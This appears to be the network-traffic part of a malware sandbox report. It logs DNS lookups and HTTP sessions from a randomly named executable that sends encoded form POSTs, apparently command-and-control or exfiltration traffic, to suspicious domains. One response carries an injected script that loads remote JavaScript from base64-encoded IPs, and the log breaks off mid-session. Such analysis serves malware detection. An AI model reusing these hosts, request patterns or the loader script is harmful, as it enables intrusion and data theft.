                                                                                                                                          Dec 9, 2024 08:49:04.277450085 CET1.1.1.1192.168.2.40x5fd4No error (0)ccchhua889911.222tt.icu172.247.112.164A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:04.277486086 CET1.1.1.1192.168.2.40x5fd4No error (0)www.jgkgf.clubccchhua889911.222tt.icuCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:04.277486086 CET1.1.1.1192.168.2.40x5fd4No error (0)ccchhua889911.222tt.icu172.247.112.164A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:04.391515970 CET1.1.1.1192.168.2.40x5fd4No error (0)www.jgkgf.clubccchhua889911.222tt.icuCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:04.391515970 CET1.1.1.1192.168.2.40x5fd4No error (0)ccchhua889911.222tt.icu172.247.112.164A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:21.596012115 CET1.1.1.1192.168.2.40x1f7aNo error (0)www.hsa.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:21.596012115 CET1.1.1.1192.168.2.40x1f7aNo error (0)www.hsa.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:21.691171885 CET1.1.1.1192.168.2.40x1f7aNo error (0)www.hsa.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:21.691171885 CET1.1.1.1192.168.2.40x1f7aNo error (0)www.hsa.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:36.291888952 CET1.1.1.1192.168.2.40xc99bNo error (0)www.sssvip2.shop156.253.8.115A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:52.775511980 CET1.1.1.1192.168.2.40x98baNo error (0)www.dutchdubliners.onlinedutchdubliners.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:52.775511980 CET1.1.1.1192.168.2.40x98baNo error (0)dutchdubliners.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:52.775554895 CET1.1.1.1192.168.2.40x98baNo error (0)www.dutchdubliners.onlinedutchdubliners.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:52.775554895 CET1.1.1.1192.168.2.40x98baNo error (0)dutchdubliners.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:07.965257883 CET1.1.1.1192.168.2.40x9162No error (0)www.allstary.top199.193.6.134A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542695999 CET1.1.1.1192.168.2.40x48b2No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542695999 CET1.1.1.1192.168.2.40x48b2No error (0)hx2.vip.84dns.com149.104.34.134A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542712927 CET1.1.1.1192.168.2.40x48b2No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542712927 CET1.1.1.1192.168.2.40x48b2No error (0)hx2.vip.84dns.com149.104.34.134A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542721987 CET1.1.1.1192.168.2.40x48b2No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.542721987 CET1.1.1.1192.168.2.40x48b2No error (0)hx2.vip.84dns.com149.104.34.134A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:39.635741949 CET1.1.1.1192.168.2.40x6cf9No error (0)www.comect.online124.6.61.130A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:55.302105904 CET1.1.1.1192.168.2.40x2ddeNo error (0)www.emirates-visa.netemirates-visa.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:55.302105904 CET1.1.1.1192.168.2.40x2ddeNo error (0)emirates-visa.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:55.302105904 CET1.1.1.1192.168.2.40x2ddeNo error (0)emirates-visa.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          • www.jgkgf.club
                                                                                                                                          • www.hsa.world
                                                                                                                                          • www.sssvip2.shop
                                                                                                                                          • www.dutchdubliners.online
                                                                                                                                          • www.allstary.top
                                                                                                                                          • www.16v9tiu00r.ink
                                                                                                                                          • www.comect.online
                                                                                                                                          • www.emirates-visa.net
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449768172.247.112.164804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:04.416198969 CET491OUTGET /tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.jgkgf.club
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:49:05.514425993 CET524INHTTP/1.0 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: max-age=259200
                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                          Content-Length: 395
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 4e 28 63 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 76 61 72 20 73 74 72 55 3d 61 74 6f 62 28 63 29 2b 22 2f 22 2b 62 74 6f 61 28 22 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 2b 27 2e 6a 73 27 3b 61 2e 73 72 63 3d 73 74 72 55 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 4e 28 22 61 48 52 30 63 48 4d 36 4c 79 38 78 4f 54 51 75 4d 54 51 33 4c 6a 6b 35 4c 6a 49 30 4e 54 6f 78 4d 54 63 78 4f 41 3d 3d 22 29 3b 4e 28 22 61 48 52 30 63 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head></head><body><script type="text/javascript">function N(c){var a=document.createElement("script");var strU=atob(c)+"/"+btoa("u="+window.location+"&p="+window.location.pathname+window.location.search)+'.js';a.src=strU;document.getElementsByTagName("body")[0].appendChild(a)}N("aHR0cHM6Ly8xOTQuMTQ3Ljk5LjI0NToxMTcxOA==");N("aHR0cHM6Ly8xNTYuMjI3LjEuODQ6NTExOA==");</script></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.44980813.248.169.48804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:21.744632959 CET743OUTPOST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 45 59 61 68 58 4b 42 4a 71 55 52 54 36 4a 52 45 39 56 50 79 44 41 33 6d 79 39 33 45 44 2f 59 45 4c 6c 34 36 35 4d 43 48 32 39 6a 57 57 66 46 5a 78 48 64 76 44 76 71 58 64 4c 38 51 6b 4f 6c 58 43 38 2b 34 4a 4a 75 71 46 35 6e 63 77 39 65 73 4b 57 51 4c 71 72 30 63 76 6c 6a 72 6f 36 66 6a 62 69 41 59 4e 42 6a 4d 49 57 50 76 44 68 4d 61 37 53 30 66 37 67 62 45 6f 6e 6e 49 59 53 59 56 32 6c 54 42 7a 62 79 55 33 76 58 31 74 54 62 4e 53 4f 62 53 4f 32 79 69 34 4c 63 73 72 47 67 53 6e 7a 58 70 76 45 32 4f 59 41 54 31 78 69 4c 6f 64 49 58 57 77 3d 3d
                                                                                                                                          Data Ascii: q0C=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
                                                                                                                                          Dec 9, 2024 08:49:22.830460072 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.44981413.248.169.48804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:24.412184954 CET763OUTPOST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 4c 59 46 71 56 34 6f 4d 34 43 4b 57 39 6a 64 32 66 4d 55 52 48 57 76 44 72 55 58 59 72 38 51 67 65 6c 58 41 30 2b 34 36 68 74 72 56 35 6c 46 67 39 63 68 71 57 51 4c 71 72 30 63 73 5a 46 72 72 4b 66 6a 71 53 41 4b 2b 5a 6b 50 49 57 4f 34 7a 68 4d 65 37 53 34 66 37 68 4d 45 70 71 49 49 61 36 59 56 33 56 54 42 68 7a 78 42 6e 76 5a 72 64 53 65 64 41 2b 65 51 2f 4c 79 6d 37 6e 62 6d 4a 43 6c 61 42 2b 4e 34 65 6c 68 63 59 6b 67 6f 32 72 2f 6c 65 31 65 4e 31 31 75 66 6b 55 7a 30 42 66 31 38 49 67 61 72 74 76 55 4a 39 63 3d
                                                                                                                                          Data Ascii: q0C=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxLYFqV4oM4CKW9jd2fMURHWvDrUXYr8QgelXA0+46htrV5lFg9chqWQLqr0csZFrrKfjqSAK+ZkPIWO4zhMe7S4f7hMEpqIIa6YV3VTBhzxBnvZrdSedA+eQ/Lym7nbmJClaB+N4elhcYkgo2r/le1eN11ufkUz0Bf18IgartvUJ9c=
                                                                                                                                          Dec 9, 2024 08:49:25.493840933 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.44982413.248.169.48804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:27.080014944 CET10845OUTPOST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 7a 59 46 59 4e 34 35 66 51 43 4c 57 39 6a 51 57 66 42 55 52 48 4c 76 43 50 51 58 59 6d 42 51 69 57 6c 56 69 4d 2b 2b 4c 68 74 6c 56 35 6c 59 77 39 64 73 4b 58 45 4c 71 62 77 63 73 4a 46 72 72 4b 66 6a 70 4b 41 61 39 42 6b 43 6f 57 50 76 44 68 36 61 37 53 55 66 34 52 63 45 70 2b 69 49 4b 61 59 56 55 39 54 48 55 48 78 63 58 76 62 71 64 53 34 64 41 7a 4f 51 2b 6e 45 6d 36 54 39 6d 4c 65 6c 65 58 33 51 6f 66 67 37 46 62 38 62 2b 48 62 6b 6a 4e 4a 45 4c 32 41 62 62 6e 77 47 67 42 48 69 78 71 39 53 75 50 4f 56 58 37 39 6d 67 65 77 66 38 71 4f 50 75 68 77 78 69 54 7a 6b 4c 70 44 39 4b 41 71 66 37 62 4c 50 51 59 45 68 51 31 42 42 45 48 59 51 7a 56 74 7a 6a 4c 4e 4b 4d 32 62 41 4e 70 5a 67 69 69 48 54 36 31 50 51 6a 35 38 53 6d 48 56 66 49 59 36 76 31 31 42 38 58 38 4c 53 41 65 58 74 46 4b 61 63 61 41 67 52 61 65 6a 32 46 6f 53 2b 75 57 43 69 30 6d 52 4c 51 69 4d 6d 67 58 [TRUNCATED]
                                                                                                                                          Data Ascii: q0C=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxzYFYN45fQCLW9jQWfBURHLvCPQXYmBQiWlViM++LhtlV5lYw9dsKXELqbwcsJFrrKfjpKAa9BkCoWPvDh6a7SUf4RcEp+iIKaYVU9THUHxcXvbqdS4dAzOQ+nEm6T9mLeleX3Qofg7Fb8b+HbkjNJEL2AbbnwGgBHixq9SuPOVX79mgewf8qOPuhwxiTzkLpD9KAqf7bLPQYEhQ1BBEHYQzVtzjLNKM2bANpZgiiHT61PQj58SmHVfIY6v11B8X8LSAeXtFKacaAgRaej2FoS+uWCi0mRLQiMmgX1NZsKwKJnGwHHvQT6EuY0wxYOHFUitJmjdeuD9zZg8wb4IrWUIDMfebv3qVGzBBxzgbxmGFNO9k7wfYulxMnICiFX5Fnl1BdVeFbGVZ1j1gWhF9TQH57fIWc9/spmrqnSALpN5mUZbapuX/Js9vxXetoTpF9IyB2eWYlcjz0EMKf3I/QWTK6v4D4MKB5O8jGgk6ppOgaR8QKiqONz2FX3ccQ0yJE2eJqgRcdbA5DCXqEv6rOPZtalyHr3NtExBB26AzOQvpsCVkVygFQ4Rs999kIy9sseDf0WxETOCODKVKoLgZxsbI/Hz8Hi8CjcWm9kOPUiNTn1U3OgzGeZvSaz//F5nnAjfelProzIXXlF6hn9hKkQKOVxsuwBAbfIFsSHWYsrV3tb+zJkZwOHssF1mR9+VWCoVgjJc+GtygS54DjfOarzBR28WQ39OG2EzkGzIWq/R/x5D1arXxe8x7W/7QojXOD7TKWVoGqSMBW8NGn0w13wQSiUQgaZbgH4AawDGCmTmkyNVFOk6tBvtz+2O45OkkDEEDlAnlYbo1SvVYwZqABPSVWiIUQrxFObEevIKJ3zluQJj1tCfA2M51P5GHHBC0Hgu/43s4qV13ZgtMy/L45uKtSAU8MIzkl2zFJu28TheJsSOMDXGVytgCOkCoxuUJOVz/GsS [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:49:28.164472103 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.44983013.248.169.48804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:29.731131077 CET490OUTGET /09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:49:30.831568956 CET377INHTTP/1.1 200 OK
                                                                                                                                          content-type: text/html
                                                                                                                                          date: Mon, 09 Dec 2024 07:49:30 GMT
                                                                                                                                          content-length: 256
                                                                                                                                          connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 30 43 3d 77 54 6a 59 4b 79 34 5a 31 6e 68 79 4e 55 59 72 67 58 57 73 4b 4a 59 58 52 70 45 73 44 74 35 33 31 32 34 53 31 41 73 74 49 41 50 4f 47 73 4e 33 31 63 39 54 4b 31 5a 30 54 47 44 72 50 43 62 53 6c 46 2f 68 66 4b 65 47 61 43 58 47 64 43 30 58 6b 4d 78 49 30 48 5a 6d 56 77 64 69 70 4f 54 7a 42 50 4c 51 41 65 52 4b 6d 6f 57 57 72 4f 4b 61 56 63 4a 49 5a 73 6f 3d 26 30 76 45 3d 7a 32 4c 58 4c 32 48 68 59 4e 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8"}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449846156.253.8.115804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:36.428558111 CET752OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 41 52 74 4e 70 4d 4e 39 66 56 39 77 52 74 70 38 73 44 4e 45 72 4a 66 44 4f 35 4f 68 36 78 39 4b 42 58 6f 33 4e 71 2f 4b 6a 62 66 38 4a 74 5a 67 49 2b 6a 74 49 41 44 4b 6a 49 63 34 58 6f 69 44 4f 75 65 74 48 50 6a 41 71 59 53 47 46 77 43 36 30 41 33 55 6f 59 67 66 39 66 36 74 70 45 70 69 76 76 42 71 36 73 72 64 77 44 47 53 65 43 44 65 36 49 4f 54 57 76 51 37 75 64 36 48 2f 4b 5a 42 59 6f 70 32 30 72 78 77 2f 4a 59 2b 67 43 38 76 64 50 59 7a 49 43 6c 56 69 7a 6a 32 77 4f 46 4c 4c 35 78 6c 34 79 70 59 78 4b 71 43 35 67 76 35 4b 75 4b 76 77 3d 3d
                                                                                                                                          Data Ascii: q0C=BaU2KBVO0kfEfARtNpMN9fV9wRtp8sDNErJfDO5Oh6x9KBXo3Nq/Kjbf8JtZgI+jtIADKjIc4XoiDOuetHPjAqYSGFwC60A3UoYgf9f6tpEpivvBq6srdwDGSeCDe6IOTWvQ7ud6H/KZBYop20rxw/JY+gC8vdPYzIClVizj2wOFLL5xl4ypYxKqC5gv5KuKvw==
                                                                                                                                          Dec 9, 2024 08:49:38.009567976 CET339INHTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Mon, 09 Dec 2024 07:49:37 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-control: no-cache,must-revalidate
                                                                                                                                          Location: /home/login
                                                                                                                                          Set-Cookie: PHPSESSID=fd04533ac3784a812578b181ba3ab03a; path=/
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449853156.253.8.115804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:39.099911928 CET772OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 6a 5a 74 64 36 55 4e 38 2f 56 36 7a 52 74 70 72 38 44 42 45 72 56 66 44 50 4d 52 67 4a 56 39 4b 6c 48 6f 32 50 53 2f 50 6a 62 66 6b 35 74 51 6b 49 2b 71 74 49 4e 32 4b 6d 6f 63 34 54 41 69 44 50 65 65 71 77 37 67 53 4b 59 4d 4f 6c 77 41 6e 6b 41 33 55 6f 59 67 66 39 6a 55 74 6f 73 70 6a 66 66 42 71 62 73 6b 51 51 44 42 43 4f 43 44 61 36 49 4b 54 57 76 79 37 73 34 76 48 38 79 5a 42 5a 59 70 78 6d 44 79 6e 50 4a 65 36 67 44 70 6c 34 6d 30 30 4b 6a 62 4b 42 72 55 78 6a 71 66 44 74 30 72 30 4a 54 2b 4b 78 75 5a 66 2b 70 62 30 4a 54 44 30 36 65 45 56 73 33 65 66 75 36 56 4d 2b 69 36 46 5a 4b 61 76 31 6f 3d
                                                                                                                                          Data Ascii: q0C=BaU2KBVO0kfEfjZtd6UN8/V6zRtpr8DBErVfDPMRgJV9KlHo2PS/Pjbfk5tQkI+qtIN2Kmoc4TAiDPeeqw7gSKYMOlwAnkA3UoYgf9jUtospjffBqbskQQDBCOCDa6IKTWvy7s4vH8yZBZYpxmDynPJe6gDpl4m00KjbKBrUxjqfDt0r0JT+KxuZf+pb0JTD06eEVs3efu6VM+i6FZKav1o=
                                                                                                                                          Dec 9, 2024 08:49:40.675672054 CET339INHTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Mon, 09 Dec 2024 07:49:40 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-control: no-cache,must-revalidate
                                                                                                                                          Location: /home/login
                                                                                                                                          Set-Cookie: PHPSESSID=df3fb8e8eef5fa1b5b5049f6ca542d73; path=/
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449861156.253.8.115804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:49:41.769617081 CET10854OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
